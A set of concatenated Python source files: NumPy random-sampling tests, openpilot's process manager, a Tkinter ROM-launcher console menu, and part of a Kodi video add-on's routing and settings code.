function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
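# Illustrative sketch (not one of the original tests): the determinism that
# TestThread depends on can be checked directly -- two generators seeded
# identically produce identical draws, regardless of which thread later
# consumes them.
def _sketch_seeded_determinism():
    first = np.random.RandomState(1234).normal(size=5)
    second = np.random.RandomState(1234).normal(size=5)
    assert_array_equal(first, second)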
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
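# Sketch of the contract exercised by TestSingleEltArrayInput: a length-1
# array parameter yields a shape-(1,) sample, while a plain Python scalar
# yields a 0-d result.
def _sketch_single_elt_shapes():
    assert_equal(np.random.exponential(np.array([2.0])).shape, (1,))
    assert_equal(np.shape(np.random.exponential(2.0)), ())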
|
process.py
|
import importlib
import os
import signal
import time
import subprocess
from abc import ABC, abstractmethod
from multiprocessing import Process
from setproctitle import setproctitle # pylint: disable=no-name-in-module
import cereal.messaging as messaging
import selfdrive.crash as crash
from common.basedir import BASEDIR
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.hardware import HARDWARE
from cereal import log
WATCHDOG_FN = "/dev/shm/wd_"
ENABLE_WATCHDOG = os.getenv("NO_WATCHDOG") is None
def launcher(proc):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# create new context since we forked
messaging.context = messaging.Context()
# exec the process
mod.main()
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
    # can't install the crash handler because sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.monotonic()
while time.monotonic() - t < timeout and process.exitcode is None:
time.sleep(0.001)
class ManagerProcess(ABC):
unkillable = False
daemon = False
sigkill = False
proc = None
enabled = True
name = ""
last_watchdog_time = 0
watchdog_max_dt = None
watchdog_seen = False
shutting_down = False
@abstractmethod
def prepare(self):
pass
@abstractmethod
def start(self):
pass
def restart(self):
self.stop()
self.start()
def check_watchdog(self, started):
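    # Watchdog protocol: the monitored process periodically writes a
    # nanosecond timestamp to /dev/shm/wd_<pid>; if that heartbeat is older
    # than watchdog_max_dt, the process is restarted. watchdog_seen is set
    # whenever the heartbeat is fresh, so a restart only fires once the
    # process has actually been seen alive.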
if self.watchdog_max_dt is None or self.proc is None:
return
try:
fn = WATCHDOG_FN + str(self.proc.pid)
self.last_watchdog_time = int(open(fn).read())
except Exception:
pass
dt = sec_since_boot() - self.last_watchdog_time / 1e9
if dt > self.watchdog_max_dt:
# Only restart while offroad for now
if self.watchdog_seen and ENABLE_WATCHDOG:
cloudlog.error(f"Watchdog timeout for {self.name} (exitcode {self.proc.exitcode}) restarting ({started=})")
self.restart()
else:
self.watchdog_seen = True
def stop(self, retry=True, block=True):
if self.proc is None:
return
if self.proc.exitcode is None:
if not self.shutting_down:
cloudlog.info(f"killing {self.name}")
sig = signal.SIGKILL if self.sigkill else signal.SIGINT
self.signal(sig)
self.shutting_down = True
if not block:
return
join_process(self.proc, 5)
# If process failed to die send SIGKILL or reboot
if self.proc.exitcode is None and retry:
if self.unkillable:
cloudlog.critical(f"unkillable process {self.name} failed to exit! rebooting in 15 if it doesn't die")
join_process(self.proc, 15)
if self.proc.exitcode is None:
cloudlog.critical(f"unkillable process {self.name} failed to die!")
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info(f"killing {self.name} with SIGKILL")
self.signal(signal.SIGKILL)
self.proc.join()
ret = self.proc.exitcode
cloudlog.info(f"{self.name} is dead with {ret}")
if self.proc.exitcode is not None:
self.shutting_down = False
self.proc = None
return ret
def signal(self, sig):
if self.proc is None:
return
# Don't signal if already exited
if self.proc.exitcode is not None and self.proc.pid is not None:
return
cloudlog.info(f"sending signal {sig} to {self.name}")
os.kill(self.proc.pid, sig)
def get_process_state_msg(self):
state = log.ManagerState.ProcessState.new_message()
state.name = self.name
if self.proc:
state.running = self.proc.is_alive()
state.pid = self.proc.pid or 0
state.exitCode = self.proc.exitcode or 0
return state
class NativeProcess(ManagerProcess):
def __init__(self, name, cwd, cmdline, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.cwd = cwd
self.cmdline = cmdline
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
pass
def start(self):
    # In case we only tried a non-blocking stop, we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cwd = os.path.join(BASEDIR, self.cwd)
cloudlog.info("starting process %s" % self.name)
self.proc = Process(name=self.name, target=nativelauncher, args=(self.cmdline, cwd))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class PythonProcess(ManagerProcess):
def __init__(self, name, module, enabled=True, persistent=False, driverview=False, unkillable=False, sigkill=False, watchdog_max_dt=None):
self.name = name
self.module = module
self.enabled = enabled
self.persistent = persistent
self.driverview = driverview
self.unkillable = unkillable
self.sigkill = sigkill
self.watchdog_max_dt = watchdog_max_dt
def prepare(self):
if self.enabled:
cloudlog.info("preimporting %s" % self.module)
importlib.import_module(self.module)
def start(self):
    # In case we only tried a non-blocking stop, we need to stop it before restarting
if self.shutting_down:
self.stop()
if self.proc is not None:
return
cloudlog.info("starting python %s" % self.module)
self.proc = Process(name=self.name, target=launcher, args=(self.module,))
self.proc.start()
self.watchdog_seen = False
self.shutting_down = False
class DaemonProcess(ManagerProcess):
"""Python process that has to stay running accross manager restart.
This is used for athena so you don't lose SSH access when restarting manager."""
def __init__(self, name, module, param_name, enabled=True):
self.name = name
self.module = module
self.param_name = param_name
self.enabled = enabled
self.persistent = True
def prepare(self):
pass
def start(self):
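    # A daemon survives manager restarts, so first check whether the PID
    # stored in params still belongs to a live instance of this module:
    # os.kill(pid, 0) only probes that the PID exists, and reading
    # /proc/<pid>/cmdline guards against PID reuse. A new copy (detached via
    # preexec_fn=os.setpgrp) is only spawned if that check fails.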
params = Params()
pid = params.get(self.param_name, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if self.module in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % self.name)
proc = subprocess.Popen(['python', '-m', self.module], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(self.param_name, str(proc.pid))
def stop(self, retry=True, block=True):
pass
def ensure_running(procs, started, driverview=False, not_run=None):
if not_run is None:
not_run = []
for p in procs:
if p.name in not_run:
p.stop(block=False)
elif not p.enabled:
p.stop(block=False)
elif p.persistent:
p.start()
elif p.driverview and driverview:
p.start()
elif started:
p.start()
else:
p.stop(block=False)
p.check_watchdog(started)
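# Minimal usage sketch (hypothetical process table, not openpilot's real
# configuration): prepare the processes once, then call ensure_running on
# every manager iteration to reconcile the desired state.
if __name__ == "__main__":
  example_procs = [
    PythonProcess("logmessaged", "selfdrive.logmessaged"),
    NativeProcess("camerad", "selfdrive/camerad", ["./camerad"]),
  ]
  for p in example_procs:
    p.prepare()
  ensure_running(example_procs, started=True)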
|
consola.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ###########################################################################
# consola.py
#
# Author: Alejandro Alpizar Lizbeth Viridiana
# Author: Mendoza Rodriguez Luis Alberto
# Author: Montoya Pérez Héctor
#
# License: MIT
#
# This program is the console's graphical user interface as well as the
# controller of many of the console's processes.
#
# ###########################################################################
from tkinter import *
from tkinter import ttk
import os
import threading
# Run the emulator with the selected game (os.system blocks until mednafen exits)
def games(juego):
os.system("mednafen /etc/FinalGame/roms/" + juego)
# Play the startup sound
def sonido():
os.system("play /etc/FinalGame/Audio.mp3")
threading.Thread(target=sonido).start()
os.system("xrandr -s 1152x864")
# Shut the console down
def salir():
os.system("sudo shutdown now")
# Build the UI
###############################################
raiz = Tk()
raiz.title("Consola")
raiz.attributes("-fullscreen",True)
raiz.resizable(1,1)
raiz.config(bg="White")
###############################################
imagen = PhotoImage(file="/etc/FinalGame/Background.png")
Label(raiz, image=imagen, bd=0).pack()
# Game launch buttons
########################################################################
Button(raiz,text="Batman" ,bg='gold',command=lambda:games("Batman.gbc") ,width=15).place(x=600,y=50,anchor="center")
Button(raiz,text="Bubble Bobble" ,bg='gold',command=lambda:games("BubbleBobble.gbc") ,width=15).place(x=600,y=100,anchor="center")
Button(raiz,text="Tarzan" ,bg='gold',command=lambda:games("Disney_Tarzan.gbc") ,width=15).place(x=600,y=150,anchor="center")
Button(raiz,text="Galaga" ,bg='gold',command=lambda:games("Galaga.gbc") ,width=15).place(x=600,y=200,anchor="center")
Button(raiz,text="Kirby" ,bg='gold',command=lambda:games("KoroKoroKirby.gbc") ,width=15).place(x=600,y=250,anchor="center")
Button(raiz,text="Mega Man" ,bg='gold',command=lambda:games("MegaManXtreme.gbc") ,width=15).place(x=600,y=300,anchor="center")
Button(raiz,text="Monopoly" ,bg='gold',command=lambda:games("Monopoly.gbc") ,width=15).place(x=600,y=350,anchor="center")
Button(raiz,text="Pokemon Red" ,bg='gold',command=lambda:games("PokemonRed.gb") ,width=15).place(x=600,y=400,anchor="center")
Button(raiz,text="Pokemon Yellow" ,bg='gold',command=lambda:games("PokemonYellowVersion.gbc") ,width=15).place(x=600,y=450,anchor="center")
Button(raiz,text="Resident Evil" ,bg='gold',command=lambda:games("ResidentEvilGaiden.gbc") ,width=15).place(x=600,y=500,anchor="center")
Button(raiz,text="Shantae" ,bg='gold',command=lambda:games("Shantae.gbc") ,width=15).place(x=600,y=550,anchor="center")
Button(raiz,text="Simpsons" ,bg='gold',command=lambda:games("SimpsonsThe-NightoftheLivingTreehouseofHorror.gbc"),width=15).place(x=600,y=600,anchor="center")
Button(raiz,text="Super Mario World",bg='gold',command=lambda:games("Super_Mario_World.smc") ,width=15).place(x=600,y=650,anchor="center")
Button(raiz,text="Tetris" ,bg='gold',command=lambda:games("Tetris.gb") ,width=15).place(x=600,y=700,anchor="center")
Button(raiz,text="Tomb Raider" ,bg='gold',command=lambda:games("TombRaiderCurseoftheSword.gbc") ,width=15).place(x=600,y=750,anchor="center")
# Console power-off button
########################################################################
Button(raiz,text="Apagar",bg='red',command=salir,width=15).place(x=600,y=800,anchor="center")
########################################################################
# Run the GUI main loop
###################################
raiz.mainloop()
###################################
|
default.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
if __name__ == '__main__':
import sys, os
reload(sys)
sys.setdefaultencoding("utf-8")
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'resources', 'lib'))
import os
import time
import shutil
import traceback
import xbmc
import xbmcaddon
from xbmcswift2 import xbmcplugin, xbmcvfs
from meta import plugin
from meta.utils.properties import get_property, set_property, clear_property
from meta.utils.rpc import RPC
from meta.gui import dialogs
from meta.play import updater
from meta.play.base import active_players, active_channelers
from meta.play.players import get_players, ADDON_SELECTOR
from meta.play.channelers import get_channelers, ADDON_PICKER
from meta.navigation.base import get_icon_path, get_background_path
import meta.navigation.movies
import meta.navigation.tvshows
import meta.navigation.live
import meta.navigation.music
import meta.navigation.lists
import meta.library.tvshows
import meta.library.movies
import meta.library.music
import meta.library.live
from meta.library.tools import channel_inventory, library_inventory
from language import get_string as _
from settings import *
from audiodb import audiodb
FORCE = plugin.get_setting(SETTING_FORCE_VIEW, bool)
VIEW = plugin.get_setting(SETTING_MAIN_VIEW, int)
addonid = 'plugin.video.plexodusplayer'
@plugin.route('/')
def root():
""" Root directory """
items = [
{
'label': _("Movies"),
'path': plugin.url_for("movies"),
'icon': get_icon_path("movies"),
'thumbnail': get_icon_path("movies"),
},
{
'label': _("TV shows"),
'path': plugin.url_for("tv"),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': _("music"),
'path': plugin.url_for("music"),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': _("TV channels"),
'path': plugin.url_for("live"),
'icon': get_icon_path("live"),
'thumbnail': get_icon_path("live"),
},
{
'label': _("Playlists"),
'path': plugin.url_for("lists"),
'icon': get_icon_path("lists"),
'thumbnail': get_icon_path("lists"),
'context_menu': [
(
_("Scan item to library"),
"RunPlugin({0})".format(plugin.url_for("lists_trakt_add_all_lists_to_library"))
)
],
},
{
'label': _("Enter search string"),
'path': plugin.url_for("root_search"),
'icon': get_icon_path("search"),
'thumbnail': get_icon_path("search"),
}
]
fanart = plugin.addon.getAddonInfo('fanart')
for item in items:
item['properties'] = {'fanart_image' : get_background_path()}
if FORCE == True: plugin.set_view_mode(VIEW); return items
else: return items
@plugin.route('/clear_cache')
def clear_cache():
""" Clear all caches """
for filename in os.listdir(plugin.storage_path):
file_path = os.path.join(plugin.storage_path, filename)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception, e:
traceback.print_exc()
dialogs.notify(msg='Cache', title='Deleted', delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/update_library')
def update_library():
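    # Addon properties act as crude locks across invocations: a timestamp is
    # stored while syncing/updating, and the work is skipped if the previous
    # run is still recent (the configured interval for syncs, 120s for
    # updates).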
is_updating = get_property("updating_library")
is_syncing = get_property("syncing_library")
now = time.time()
if is_syncing and now - int(is_syncing) < plugin.get_setting(SETTING_UPDATE_LIBRARY_INTERVAL, int) * 60:
plugin.log.info("Skipping library sync")
else:
if plugin.get_setting(SETTING_LIBRARY_SYNC_COLLECTION, bool) == True or plugin.get_setting(
SETTING_LIBRARY_SYNC_WATCHLIST, bool) == True:
try:
set_property("syncing_library", int(now))
if plugin.get_setting(SETTING_LIBRARY_SYNC_COLLECTION, bool) == True:
meta.library.tvshows.sync_trakt_collection()
meta.library.movies.sync_trakt_collection()
if plugin.get_setting(SETTING_LIBRARY_SYNC_WATCHLIST, bool) == True:
meta.library.tvshows.sync_trakt_watchlist()
meta.library.movies.sync_trakt_watchlist()
except: plugin.log.info("something went wrong")
finally: clear_property("syncing_library")
else: clear_property("syncing_library")
if is_updating and now - int(is_updating) < 120:
plugin.log.debug("Skipping library update")
return
if plugin.get_setting(SETTING_LIBRARY_UPDATES, bool) == True:
try:
set_property("updating_library", int(now))
meta.library.tvshows.update_library()
meta.library.movies.update_library()
meta.library.music.update_library()
finally: clear_property("updating_library")
else: clear_property("updating_library")
@plugin.route('/authenticate_trakt')
def trakt_authenticate():
from trakt import trakt
trakt.trakt_authenticate()
@plugin.route('/settings/players/<media>')
def settings_set_players(media):
playericon = get_icon_path("player")
medias = ["movies","tvshows","musicvideos","music","live"]
if media == "all":
for med in medias:
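            # Crude singularization of the media key for display purposes
            # ("movies" -> "movie", "tvshows" -> "TV show", "live" -> "TV", ...)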
mediatype = med.replace('es','e').replace('ws','w').replace('all','').replace('os','o').replace('vs','v s').replace('tv','TV').replace('musicvideo','Music video').replace('live','TV')
players = get_players(med)
selected = [p.id for p in players]
if selected is not None:
if med == "movies":
plugin.set_setting(SETTING_MOVIES_ENABLED_PLAYERS, selected)
elif med == "tvshows":
plugin.set_setting(SETTING_TV_ENABLED_PLAYERS, selected)
elif med == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, selected)
elif med == "music":
plugin.set_setting(SETTING_MUSIC_ENABLED_PLAYERS, selected)
elif med == "live":
plugin.set_setting(SETTING_LIVE_ENABLED_PLAYERS, selected)
else:
raise Exception("invalid parameter %s" % media)
dialogs.notify(msg="{0} {1}".format(_(mediatype).capitalize(), _("Player").lower()), title=_('Enabled'), delay=1000, image=get_icon_path("player"))
dialogs.notify(msg="{0}".format(_("Player")), title="{0} {1}".format(_("All"), _('Enabled').lower()), delay=1000, image=get_icon_path("player"))
return True
elif media == "tvportal":
players = get_players("live")
selected = [p.id for p in players]
plugin.set_setting(SETTING_LIVE_ENABLED_PLAYERS, selected)
return
else:
mediatype = media.replace('es','e').replace('ws','w').replace('all','').replace('os','o').replace('vs','v s').replace('tv','TV').replace('musicvideo','Music video').replace('live','TV')
players = get_players(media)
preselected = [p.id for p in active_players(media)]
players_list = [p.clean_title for p in players]
if media == "movies":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MOVIES_ENABLED_PLAYERS, unicode)])
elif media == "tvshows":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_TV_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_TV_ENABLED_PLAYERS, unicode)])
elif media == "musicvideos":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, unicode)])
elif media == "music":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_MUSIC_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_MUSIC_ENABLED_PLAYERS, unicode)])
elif media == "live":
players_on = sorted(["[B]{0}[/B]".format(p.clean_title) for p in players if p.id in plugin.get_setting(SETTING_LIVE_ENABLED_PLAYERS, unicode)])
players_off = sorted(["[I]{0}[/I]".format(p.clean_title) for p in players if p.id not in plugin.get_setting(SETTING_LIVE_ENABLED_PLAYERS, unicode)])
players_total = players_off + players_on
version = xbmc.getInfoLabel('System.BuildVersion')
selected = None
msg = "{0}: {1}?".format(_("Enable"), _("All"))
if dialogs.yesno("{0} {1} ({2} = {3})".format(_("Enable"), _("Player").lower(), _("Type").lower(), _("%s" % mediatype)), msg):
selected = [p.id for p in players]
else:
if int(version[0:2]) > 15:
result = dialogs.multiselect("{0} {1} ({2} = {3})".format(_("Enable"), _("Player").lower(), _("Type").lower(), _("%s" % mediatype)), players_on + players_off)
if result is not None: selected = [players[i].id for i in result]
else:
enabled = None
while enabled != -1:
dialogs.notify(msg="Back / Close / Escape", title="To confirm, press:", delay=5000, image=get_icon_path("player"))
enabled = dialogs.select("[I]{0}[/I] / [B]{1}[/B] ".format(_("Disabled"), _("Enabled").lower()), players_off + players_on)
if (len(players_off) - 1) >= enabled > -1:
players_off.remove(players_total[enabled])
players_on.append(players_total[enabled].replace("I]","B]"))
players_on = sorted(players_on)
players_total = players_off + players_on
elif (len(players_total) - 1) >= enabled > (len(players_off) - 1):
players_on.remove(players_total[enabled])
players_off.append(players_total[enabled].replace("B]","I]"))
players_off = sorted(players_off)
players_total = players_off + players_on
selected = [players[players_list.index(i.replace("[B]","").replace("[/B]",""))].id for i in players_on]
if selected is not None and selected != preselected:
if media == "movies":
plugin.set_setting(SETTING_MOVIES_ENABLED_PLAYERS, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_ENABLED_PLAYERS, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_ENABLED_PLAYERS, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_ENABLED_PLAYERS, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_ENABLED_PLAYERS, selected)
else:
raise Exception("invalid parameter %s" % media)
settings_set_default_player(media)
@plugin.route('/settings/channelers')
def settings_set_channelers():
medias = ["movies","tvshows","live"]
for media in medias:
channelers = get_channelers(media)
selected = [p.id for p in channelers]
if selected is not None:
if media == "movies":
plugin.set_setting(SETTING_MOVIES_ENABLED_CHANNELERS, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_ENABLED_CHANNELERS, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_ENABLED_CHANNELERS, selected)
else:
raise Exception("invalid parameter %s" % media)
print "Plexodus player Guidance: Movie, TV and Live players enabled"
return True
@plugin.route('/settings/default_channeler/<media>')
def settings_set_default_channeler(media):
channelers = active_channelers(media)
channelers.insert(0, ADDON_PICKER)
media = media.replace('es','e').replace('ws','w').replace('all','').replace('os','o').replace('vs','v s')
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format(_("Default").lower(), _("Player").lower()))), [p.title for p in channelers])
if selection >= 0:
selected = channelers[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_CHANNELER, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_CHANNELER, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_CHANNELER, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_CHANNELER, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_CHANNELER, selected)
else:
raise Exception("invalid parameter %s" % media)
@plugin.route('/settings/default_player/<media>')
def settings_set_default_player(media):
players = active_players(media)
players.insert(0, ADDON_SELECTOR)
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format(_("Default").lower(), _("Player").lower()))), [p.title for p in players])
if selection >= 0:
selected = players[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_PLAYER, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_PLAYER, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_PLAYER, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_PLAYER, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_PLAYER, selected)
else:
raise Exception("invalid parameter %s" % media)
plugin.open_settings()
@plugin.route('/settings/default_player_fromlib/<media>')
def settings_set_default_player_fromlib(media):
players = active_players(media)
players.insert(0, ADDON_SELECTOR)
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format(_("Library").lower(), _("Player").lower()))), [p.title for p in players])
if selection >= 0:
selected = players[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_PLAYER_FROM_LIBRARY, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_PLAYER_FROM_LIBRARY, selected)
else:
raise Exception("invalid parameter %s" % media)
plugin.open_settings()
@plugin.route('/settings/default_player_fromcontext/<media>')
def settings_set_default_player_fromcontext(media):
players = active_players(media)
players.insert(0, ADDON_SELECTOR)
selection = dialogs.select("{0}".format(_("Select {0}").format("{0} {1}".format("context", _("Player").lower()))), [p.title for p in players])
if selection >= 0:
selected = players[selection].id
if media == "movies":
plugin.set_setting(SETTING_MOVIES_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "tvshows":
plugin.set_setting(SETTING_TV_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "musicvideos":
plugin.set_setting(SETTING_MUSICVIDEOS_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "music":
plugin.set_setting(SETTING_MUSIC_DEFAULT_PLAYER_FROM_CONTEXT, selected)
elif media == "live":
plugin.set_setting(SETTING_LIVE_DEFAULT_PLAYER_FROM_CONTEXT, selected)
else:
raise Exception("invalid parameter %s" % media)
plugin.open_settings()
@plugin.route('/update_players')
@plugin.route('/update_players/<url>', name='update_players_url')
def update_players(url = None):
if url is None: url = plugin.get_setting(SETTING_PLAYERS_UPDATE_URL, unicode)
if updater.update_players(url): dialogs.notify(msg=_('Update'), title=_('Updated for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
else: dialogs.notify(msg=_('Update'), title=_('Failed for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
plugin.open_settings()
@plugin.route('/setup/total')
def total_setup():
dialogs.notify(msg='Total Setup', title=_("Start"), delay=1000, image=get_icon_path("metalliq"))
if sources_setup() == True: pass
if players_setup() == True: pass
dialogs.notify(msg='Total Setup', title=_("Done"), delay=5000, image=get_icon_path("metalliq"))
@plugin.route('/setup/silent')
def silent_setup():
set_property("running","totalmetalliq")
movielibraryfolder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
try: meta.library.movies.auto_movie_setup(movielibraryfolder)
except: pass
tvlibraryfolder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
try: meta.library.tvshows.auto_tvshows_setup(tvlibraryfolder)
except: pass
musiclibraryfolder = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
try: meta.library.music.auto_music_setup(musiclibraryfolder)
except: pass
livelibraryfolder = plugin.get_setting(SETTING_LIVE_LIBRARY_FOLDER, unicode)
try: meta.library.live.auto_live_setup(livelibraryfolder)
except: pass
clear_property("running")
@plugin.route('/setup/players')
def players_setup():
set_property("running","totalmetalliq")
url = "https://api.github.com/repos/bcrusher29/players/zipball"
if updater.update_players(url): dialogs.notify(msg=_('Player'), title=_('Updated for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
else: dialogs.notify(msg=_('Player'), title=_('Failed for {0}').format(_('Player')), delay=1000, image=get_icon_path("player"))
xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/settings/players/all/)")
clear_property("running")
return True
@plugin.route('/setup/sources')
def sources_setup():
movielibraryfolder = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
try:
meta.library.movies.auto_movie_setup(movielibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('Movies'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("movies"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_("Movies"), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('Movies'), delay=1000, image=get_icon_path("movies"))
tvlibraryfolder = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
try:
meta.library.tvshows.auto_tvshows_setup(tvlibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('TV shows'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("tv"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_("TV shows"), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('TV shows'), delay=1000, image=get_icon_path("tv"))
musiclibraryfolder = plugin.get_setting(SETTING_MUSIC_LIBRARY_FOLDER, unicode)
try:
meta.library.music.auto_music_setup(musiclibraryfolder)
